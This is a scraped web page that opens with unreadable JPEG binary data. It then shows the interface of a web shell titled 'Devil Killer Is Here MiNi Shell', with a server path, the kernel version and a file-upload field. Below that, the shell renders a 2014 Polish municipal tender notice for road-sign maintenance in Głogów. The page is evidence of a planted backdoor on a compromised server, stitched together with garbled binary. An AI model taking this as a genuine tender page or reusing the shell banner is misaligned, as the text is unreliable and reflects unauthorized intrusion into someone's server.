JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140212/28167-N-2014.html

<p class="kh_header"><b>Głogów: Bieżące utrzymanie oznakowania pionowego, poziomego, urządzeń bezpieczeństwa ruchu drogowego, tablic z nazwami ulic oraz wykonanie aktywnych przejść dla pieszych na drogach gminnych i powiatowych w granicach administracyjnych miasta Głogowa</b><br>
<b>Numer ogłoszenia: 28167 - 2014; data zamieszczenia: 12.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie oznakowania pionowego, poziomego, urządzeń bezpieczeństwa ruchu drogowego, tablic z nazwami ulic oraz wykonanie aktywnych przejść dla pieszych na drogach gminnych i powiatowych w granicach administracyjnych miasta Głogowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest bieżące utrzymanie oznakowania pionowego, poziomego, urządzeń bezpieczeństwa ruchu drogowego, tablic z nazwami ulic oraz wykonanie aktywnych przejść dla pieszych na drogach gminnych i powiatowych w granicach administracyjnych miasta Głogowa.

Oznakowanie pionowe:
przegląd oznakowania, tablic z nazwami ulic, urządzeń bezpieczeństwa ruchu drogowego dróg gminnych i powiatowych - koszt objazdów należy uwzględnić          w cenach w kosztorysie ofertowym  w załączeniu wykaz dróg,
objazdy należy wykonywać przynajmniej jeden raz w tygodniu,
wymiana dostawa i montaż   uszkodzonych i nieczytelnych znaków drogowych,
wymiana (dostawa i montaż)  uszkodzonych słupków,
dostawa i montaż nowych słupków i znaków drogowych zgodnie z zaleceniem Zamawiającego,
regeneracja nieczytelnych znaków drogowych oraz słupków.
dostawa i montaż elementów urządzeń bezpieczeństwa ruchu drogowego w tym:
progi zwalniające płytowe
ogrodzenia segmentowe U-12a
ogrodzenia łańcuchowe U-12b
ogrodzenie rurowe
lustra drogowe
bariery energochłonne
-przeróbka oznakowania Zamawiającego zgodnie z zaleceniami oraz zgodnie z zapisami rozporządzenia nr 220, poz. 2181 z 2003 r ze zmianami w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach

Wykonawca zobowiązany jest do prowadzenia dziennika konserwacji oznakowania

2.Wymogi dla Wykonawców bieżącego utrzymania oznakowania pionowego:

a)uszkodzone znaki ostrzegawcze i zakazu należy wymienić w przeciągu 2 godzin 
od zgłoszenia,
b)w przypadku uszkodzenia znaku A-7 lub B-20 wymiany należy dokonać w przeciągu 
1 godziny od momentu zgłoszenia,
c)w przypadku wszystkich innych znaków czas nie może być dłuższy niż 8 godzin 
od zgłoszenia,
d)uszkodzone tabliczki z nazwami ulic należy wymienić w przeciągu 4 dni od daty zgłoszenia,
e)w sytuacjach awaryjnych wymogi określone w pkt. a, b, c obowiązują również w dni wolne od pracy.

3.Warunki techniczne umieszczania znaków drogowych.

Znaki drogowe na drogach gminnych winny być montowane z grupy M (małe), na drogach powiatowych z grupy S (średnie), znaki A - 7 i B - 20 powinny mieć taką samą grupę jak znaki na drodze z pierwszeństwem przejazdu, jednak nie mniejszą niż znaki średnie.
Znaki drogowe na ulicach umieszcza się w odległości 0,5 - 2,0 m od krawędzi jezdni 
na wysokości:
-2,20 m na chodnikach, ciągach  pieszo - rowerowych, drogach rowerowych, mierząc 
od dolnej krawędzi tarczy znaku do poziomu powierzchni,
-2,00 m na poboczu przyległym do jezdni, chodnika, drogi rowerowej mierząc 
od dolnej krawędzi tarczy znaku do poziomu powierzchni,
-następny znak powinien być umieszczony za poprzedzającym w odległości co najmniej 10 m na drogach w obszarze zabudowanym oraz drogach o dopuszczalnej prędkości poniżej 60 km h,
-znaki drogowe umieszcza się po prawej stronie jezdni, 
-nad jezdnią, jeżeli dotyczą jadących wszystkimi pasami ruchu,
-nad poszczególnymi pasami ruchu, jeżeli dotyczą jadących tylko tymi pasami ruchu,
-po lewej stronie jezdni: jako powtórzenie znaków umieszczonych po prawej stronie 
na drogach dwujezdniowych, których jezdnie posiadają więcej niż jeden pas ruchu, 
na drodze jednokierunkowej, przy czym jako obowiązujące dotyczy to znaków D - 6, 
D - 6a, D - 6b,
-na jezdni, jeżeli droga jest zamknięta dla ruchu kołowego lub ruch na niej jest ograniczony,
-na wysepkach w obrębie skrzyżowań, jeżeli znak nakazu wskazuje obowiązek jazdy 
w określonym kierunku
-jeżeli znak po lewej stronie jest powtórzeniem znaku umieszczonego po prawej stronie, to powinien znajdować się na tym samym przekroju poprzecznym drogi.

Tarcze znaków drogowych umieszcza się na słupkach ocynkowanych o średnicy fi 50 i o przekroju kołowym lub eliptycznym zakończonych kapturkiem plastikowym.
Słupki do znaków drogowych należy osadzać na głębokości 0,7 - 1,0 m, klinując je suchym betonem, w taki sposób aby uniemożliwić ich pochylenie lub wyrwanie. Zakończenie słupków winno być zaopatrzone w dwa wąsy, przyspawane po przekątnej, natomiast górna część słupka powinna być zabezpieczona plastikowym kapturkiem.
Dopuszcza się do umieszczania znaków z wykorzystaniem słupów linii telekomunikacyjnych, słupów oświetleniowych, słupów trakcyjnych i masztów sygnalizatorów oraz ścian budynków.
Tarcze znaków drogowych winny być wykonane z blach aluminiowych z podwójnie giętą krawędzią pokryte folią odblaskową typu 2
Tablice nazw ulic powinny być pokryte folią odblaskową typu 2 i posiadać wymiary 
920 x 210 mm koloru ultramaryna (WEBER terranowa 510a) winny być montowane 
na słupkach malowanych proszkowo koloru ciemnoniebieskiego (ATLAS 0523). Tablice z nazwami ulic winny być umieszczone na wysokości 2,5 m mierząc od dolnej krawędzi tarczy znaku do poziomu powierzchni.
Znaki drogowe, urządzenia bezpieczeństwa ruchu oraz ich stosowanie winny spełniać wymogi zawarte w załączniku 1 - 4 do rozporządzenia nr 220, poz. 2181 z 2003 r ze zmianami w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach
W formularzu ofertowym ujęty jest zakres przewidywanych robót. 
Wykonanie i rozliczenie następować będzie wg faktycznych potrzeb.

Oznakowanie poziome dróg:
a)wykonanie oznakowania poziomego farbą chlorokauczukową z dodatkiem mikrokulek retrorefleksyjnych do oznakowania nawierzchni asfaltowych dróg gminnych 
i powiatowych,
b)wykonanie oznakowania poziomego farbą chemoutwardzalną z dodatkiem mikrokulek retrorefleksyjnych do oznakowania nawierzchni asfaltowych dróg gminnych i powiatowych posiadających nowe nawierzchnie, które zostaną wskazane przez Zamawiającego,
c)wykonanie oznakowania poziomego progów zwalniających wykonanych z kostki betonowej typu polbruk farbą chemoutwardzalną z dodatkiem mikrokulek retrorefleksyjnych

Przed przystąpieniem do odbioru robót wykonawca zobowiązany będzie do przedstawienia atestu na zastosowaną farbę wraz z kserokopią faktury zakupu.
Oznakowanie aktywne przejść dla pieszych - zestaw znaków aktywnych D-6 powinien  składać się z:
-2 słupów ze stali ocynkowanej o przekroju 75 mm, o wysokości min. 5,5 m
-2 paneli fotowoltaicznych o mocy min. 75 W
-2 akumulatorów żelowych o pojemności 36 Ah i napięciu 12 V
-2 znaków podświetlanych D-6 diodowych z animacją ludzika  (ludzik migający a w momencie pojawienia się pieszego w obrębie przejścia dla pieszych ludzik kroczący w trzech fazach ) wraz z 2 lampami ostrzegawczymi wykonanymi w technologii LED (zasilanymi solarnie z komunikacją radiową)  i uruchomianymi automatycznie poprzez czujnik ruchu w momencie, gdy pieszy pojawi się w obrębie przejścia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>powtórzenie tego samego rodzaju zamówień, zgodnie z przedmiotem zamówienia stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4, 45.23.32.90-8, 45.23.32.94-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium Zamawiający ustalił w kwocie: 31.000,00 zł 
      słownie: trzydzieści jeden tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w w okresie  5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali robotę budowlaną polegającą na  wykonaniu oznakowania pionowego i urządzeń bezpieczeństwa ruchu drogowego na kwotę co najmniej 200.000,00 zł brutto oraz roboty polegającej na wykonaniu oznakowania poziomego na kwotę co najmniej 200.000,00 zł brutto.
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu robót budowlanych i dowodów dot. najważniejszych robót potwierdzających, że roboty zostały wykonane w sposób należyty ,oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone na zasadzie spełnia - nie spełnia.Zamawiający za roboty najważniejsze rozumie roboty podobne do ujętych w rozdziale VI. pkt.1 ppkt 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy a)	dysponują co najmniej po 1 szt. każdego z  wymienionych  sprzętów tj.  frezarka, sprężarka, malowarka z urządzeniami dawkującymi mikrokulki retrorefleksyjne, układarka mas chemoutwardzalnych ,
b)	dysponują osobami zdolnymi do wykonania zamówienia, 
kadra kierowania budową musi posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego, a w odniesieniu do obywateli państw członkowskich UE, które nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej w wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, uprawnienia odpowiadające wymaganiom określonym w ustawie Prawo budowlane oraz odpowiednią decyzję o uznaniu kwalifikacji zawodowych. Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób, które będą odpowiedzialne za realizację zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub dostęp do kredytu w wysokości minimum  100.000,00 zł, 
b)	  posiadają ubezpieczenie od OC z tytułu prowadzonej działalności gospodarczej  na kwotę co najmniej   400.000,00 zł                     
Ocena spełnienia warunku będzie dokonana na podstawie złożonej informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową oraz na podstawie złożonego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od OC na wymagana sumę ubezpieczenia , dowodu jego opłacenia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony  załącznik nr 1 - formularz OFERTA  
  2)   Pełnomocnictwo dla pełnomocnika podmiotów występujących wspólnie,
   3)   Pełnomocnictwo dla osoby podpisującej ofertę i oświadczenia - jeśli uprawnienie tej osoby nie wynika z innych dokumentów dołączonych do oferty,
4)  wypełniony i podsumowany   załącznik Nr 1 do SIWZ 
5)   Kopia dowodu wniesienia wadium. 
6) Wykaz części zamówienia, które wykonawca zamierza zlecić do wykonania  podwykonawcom.
7)   Zobowiązania innych podmiotów.
8)  W przypadku, gdy osobą uprawnioną do składania ofert w imieniu Wykonawcy w trakcie aukcji elektronicznej będzie inna osoba niż osoba uprawniona do reprezentowania podmiotu wynikająca np. z KRS, należy załączyć do oferty pełnomocnictwo dla tej osoby, podpisane  przez osobę uprawniona do reprezentowania Wykonawcy, z którego wynikać będzie prawo do reprezentowania Wykonawcy w aukcji elektronicznej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://zakupy.marketplanet.pl</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie będą mogły nastąpić w następujących przypadkach:
1) wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych   w Ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2) wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów                                    w następujących przypadkach:
a)    śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b) nie wywiązywania się kluczowego specjalisty z obowiązków wynikających                           z umowy.
3)   Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji itp.),
4)   Zamawiający może zażądać od Wykonawcy zmiany kluczowego specjalisty jeżeli uzna,                że kluczowy specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty,
5)    Zmiana terminu wykonania Przedmiotu Umowy o czas opóźnienia, jeżeli takie opóźnienie  jest lub będzie miało wpływ na wykonanie Przedmiotu Umowy w przypadku:
a)  zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych                           od Wykonawcy,
b) wykopalisk uniemożliwiających wykonanie robót,
c) szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie   robót budowlanych, 
d)	siły wyższej, klęski żywiołowej
e)	opóźnienia, utrudnienia lub przeszkody  spowodowane przez lub dających się przypisać Zamawiającemu lub innemu Wykonawcy zatrudnionemu przez Zamawiającego na Terenie Budowy,
f)	niewypałów i niewybuchów,
g)	wykopalisk archeologicznych nieprzewidywanych w SIWZ,
